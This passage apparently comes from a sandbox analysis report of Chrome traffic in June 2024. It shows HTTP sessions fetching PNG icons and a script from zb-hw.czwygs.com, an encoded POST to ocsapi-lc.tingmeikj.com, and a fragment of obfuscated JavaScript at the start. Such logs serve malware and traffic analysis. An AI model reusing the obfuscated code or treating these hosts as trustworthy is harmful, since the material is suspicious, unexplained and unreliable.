                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnANgF0AaAbwAkEANAZQC4AzAVzRgBcBLdTEYgJ2JsAlKQBETJCAAESNnw7tRAbgDyYAFYh2AOgAmIBhzQgACnxQQQfNgE9MA0QH1HIJAFkUupgBsQosgBuUN5MIHQAhAAMAL5Cgnr2xKJIMObevnz+zKyc3CJ8IGxMfGhSKLHxuomiMFB8umYoARz6fACiAB4wIfpZLOxcaJj5hcWlMLFKQXx


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          518192.168.2.55029690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC386OUTGET /pc/image-pc/index/382/button/icon_member_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1940
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:10 GMT
                                                                                                                                                          ETag: "64c0a206-794"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE25[11],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,5],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063151
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0830361f08f0cc3b6d1455c0a3ded198
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528849
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC1940INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 25 08 06 00 00 00 c5 9e 20 03 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR%% tEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          519192.168.2.55029990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC384OUTGET /pc/image-pc/index/382/button/icon_coin_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2146
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:10 GMT
                                                                                                                                                          ETag: "64c0a206-862"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE5[3],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063151
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 067a96d05c0fac2a6dce819536f29793
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528849
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC2146INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 25 08 06 00 00 00 c5 9e 20 03 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR%% tEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          520192.168.2.55029790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC383OUTGET /pc/image-pc/index/382/button/icon_vip_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1820
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:11 GMT
                                                                                                                                                          ETag: "64c0a207-71c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE17[3],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063151
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d86dd8098a95c35b9cd0e3455d1683cf
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528849
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC1820INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 25 08 06 00 00 00 c5 9e 20 03 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR%% tEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          521192.168.2.55030190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC384OUTGET /pc/image-pc/index/382/button/icon_prom_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 908
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:11 GMT
                                                                                                                                                          ETag: "64c0a207-38c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE8[4],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063151
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3b2eb91d7fd8af5b9b6ed45fcbf3cf45
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528849
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC908INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 25 08 06 00 00 00 c5 9e 20 03 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 3e 49 44 41 54 58 85 d5 d7 cd 8b 1c 55 14 05 f0 5f f5 74 24 4e 34 9a 60 34 12 0d c2 68 c0 95 0b 41 dc 25 a2 18 31 62 14 1a c1 9d 20 48 50 f0 3f 70 e5 3e e0 07 2a 8a e2 4e 30 71 c4 45 c4 20 63 e2 4e 04 17 6e 54 64 06 f2 e1 c4 44 4d 8c 1f 1d 3b 33 5d 75 5d f4 eb 99 ea ca 74 d3 3d 26 e9 f1 c0 81 7e ef 9e 7b ef e1 d5 ab 4b 97 88 d0 4b 7b 22 4c 47 38 95 b6 ce 47 f8 32 c2 f3 11 d6 47 b0 0a ae 4f f9 47 53 bd 48 f5 a7 53 bf 1e fd b2 99 dc b6 c8 cd 44 2e 06 f0 78 e4 76 45 ce 08 dc 95 f2 06 d5 9d 49 fd 45 de 35 d5 b6 25 da 66 a3 2d 86 e0 c5 68 6b 44 9b 21 d8 48 fa 61 ea ce 26 1f c9 d4 82 c3 b1 20
                                                                                                                                                          Data Ascii: PNGIHDR%% pHYs>IDATXU_t$N4`4hA%1b HP?p>*N0qE cNnTdDM;3]u]t=&~{KK{"LG8G2GOGSHSD.xvEIE5%f-hkD!Ha&


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          522192.168.2.55029890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC384OUTGET /pc/image-pc/index/312/parner/logo_monaco.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 5239
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:56 GMT
                                                                                                                                                          ETag: "5d71fe88-1477"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[2],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE1[3],EU-FRA-paris-GLOBAL1-CACHE14[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465109
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d2765377724cd97732e8b0f68102a936
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC5239INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 22 00 00 00 3a 08 06 00 00 00 d5 c2 8b 34 00 00 14 3e 49 44 41 54 68 43 c5 99 77 5c 54 67 d6 c7 bf 77 ee 54 da d0 7b 15 51 10 05 6b d4 44 d1 d8 62 8b 62 47 51 57 8d 12 35 46 d1 35 6e 12 53 d4 94 8d e9 26 1a b1 64 83 dd a0 b1 46 b3 1a 4b 22 88 58 10 45 9a 05 bb 28 02 03 c3 30 03 d3 ee bc 9f 21 9b 7d 37 6d dd 6c 3e ef e7 9d 7f 66 e6 ce 7d ce f3 bd e7 3c e7 f7 9c e7 8c c0 1f 7c ad 5f a4 98 ed a2 56 47 4e 58 66 58 f4 47 4c 09 7f 64 70 fa a4 76 53 66 8c f2 5b 2b 49 56 c5 de 13 f6 bf bc f2 71 ee bb ff ad bd 3f 04 e2 0d 61 af 3c cf 1a ff 20 ff d0 39 2f 3f 1c 56 07 37 ff 5f 40 62 43 f0 c9 58 de 35 5b e3 aa f6 4c 5f fc 7d d2 a9 12 ae fd 9f 81 e4 64 06 3c e3 e7 a5 ef 5b 57 6f a7 b0 d4 fa dd 8c b7 59 fb e3 64
                                                                                                                                                          Data Ascii: PNGIHDR":4>IDAThCw\TgwT{QkDbbGQW5F5nS&dFK"XE(0!}7ml>f}<|_VGNXfXGLdpvSf[+IVq?a< 9/?V7_@bCX5[L_}d<[WoYd


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          523192.168.2.55030090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC374OUTGET /pc/image-pc/nav/ico_arrow_down.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 202
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 05 Jul 2019 07:58:30 GMT
                                                                                                                                                          ETag: "5d1f0326-ca"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE14[2],EU-FRA-paris-GLOBAL1-CACHE14[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465108
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9815798c28c3f2d46dc7561ee1a57ec4
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC202INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 06 08 06 00 00 00 f7 ee 7f 81 00 00 00 91 49 44 41 54 28 53 63 d4 34 34 6e 62 64 64 30 fa f5 e9 63 f0 9d 3b 77 7e 32 60 01 c6 c6 c6 5c df ff 31 6c fe cf c0 70 94 11 24 af 65 68 5c c7 c0 c8 60 c6 c9 c8 10 76 f6 ec d9 6f c8 7a 40 8a bf fd 63 d8 ca c0 c0 70 f8 fa f9 b3 75 60 0d 70 4d 0c 0c f6 9c 4c 0c be 30 4d 5a 5a 5a 3c 0c ec 9c 3b fe 33 30 ec 03 29 06 a9 83 6b 40 d2 e4 c6 f0 f3 bb 07 d8 14 34 c5 18 1a 50 34 31 30 30 20 9b 0c 73 09 8a 0d c8 ce fb cf c0 c0 02 73 06 b2 9f 00 1b a4 38 16 ca 89 1e 2d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDRIDAT(Sc44nbdd0c;w~2`\1lp$eh\`voz@cpu`pML0MZZZ<;30)k@4P4100 ss8-IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          524192.168.2.550290103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC678OUTPOST /zb-cloud/pwv/sn.notice.new.layer.query HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 560
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC560OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 53 5a 67 4f 51 48 54 73 6f 4d 55 61 4b 73 48 72 55 30 41 73 58 75 4f 69 4f 76 68 33 52 6e 66 33 51 74 55 75 4c 78 4a 30 45 44 48 6b 5a 72 41 62 43 66 49 6a 47 61 66 64 71 32 35 77 6c 46 53 74 49 71 54 77 53 30 50 6d 49 67 4e 63 4b 6d 4b 6c 4b 68 47 6d 43 6c 5a 78 5a 73 50 77 4c 45 46 7a 76 32 45 62 51 79 47 75 4c 30 4b 74 49 71 55 6b 68 74 35 76 78 33 4f 75 43 32 54 78 6c 6d 54 33 4a 6b 79 78 66 4a 48 6c 55 74 49 31 4c 45 58 35 55 4e 57 6f 4e 49 48 4d 49 5a 51 75 6a 52 51 65 4a 58 31 76 47 59 4d 78 4d 44 4e 5a 48 52 65 53 4b 47 55 6c 6c 32 34 72 50 76 50 7a 58 30 59 7a 43 6e 59 31 63 43 5a 35 50 42 45 66 55 45 50 4f 4b 50 46 64 67 46 49 78 5a 53 6a 73 41 57 57 34 57 46 56 68 50 57 5a 49 41 44 4f 6d 47 63 4a 77 56 6d 48
                                                                                                                                                          Data Ascii: json=pwv|13|SZgOQHTsoMUaKsHrU0AsXuOiOvh3Rnf3QtUuLxJ0EDHkZrAbCfIjGafdq25wlFStIqTwS0PmIgNcKmKlKhGmClZxZsPwLEFzv2EbQyGuL0KtIqUkht5vx3OuC2TxlmT3JkyxfJHlUtI1LEX5UNWoNIHMIZQujRQeJX1vGYMxMDNZHReSKGUll24rPvPzX0YzCnY1cCZ5PBEfUEPOKPFdgFIxZSjsAWW4WFVhPWZIADOmGcJwVmH
                                                                                                                                                          2024-06-09 22:41:19 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:19 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          2024-06-09 22:41:19 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 31 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 1
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:19 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          525192.168.2.55030490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC548OUTGET /pc/240516-03/static/js/t4043-index-js.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7496
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:34 GMT
                                                                                                                                                          ETag: "6645cb6e-1d48"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE14[3],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,2],1.1 google
